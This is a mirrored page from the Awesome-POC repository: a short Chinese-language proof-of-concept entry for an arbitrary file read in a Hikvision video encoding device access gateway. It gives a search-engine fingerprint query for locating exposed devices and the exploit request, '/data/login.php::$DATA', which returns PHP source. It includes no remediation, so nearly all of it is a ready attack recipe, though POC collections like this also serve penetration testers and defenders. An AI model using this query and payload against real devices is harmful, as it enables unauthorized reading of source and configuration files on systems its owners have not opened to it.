admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/HIKVISION 视频编码设备接入网关 $DATA 任意文件读取.md

31 lines
507 B
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Hikvision 视频编码设备接入网关 $DATA 任意文件读取
## 漏洞描述
Hikvision 视频编码设备接入网关存在配置错误特性特殊后缀请求php文件可读取源码
## 漏洞影响
```
Hikvision 视频编码设备接入网关
```
## 网络测绘
```
title="视频编码设备接入网关"
```
## 漏洞复现
登陆页面
![image-20220519174129368](images/202205191741462.png)
POC
```
/data/login.php::$DATA
```
![image-20220519174235421](images/202205191742487.png)
Reference in New Issue Copy Permalink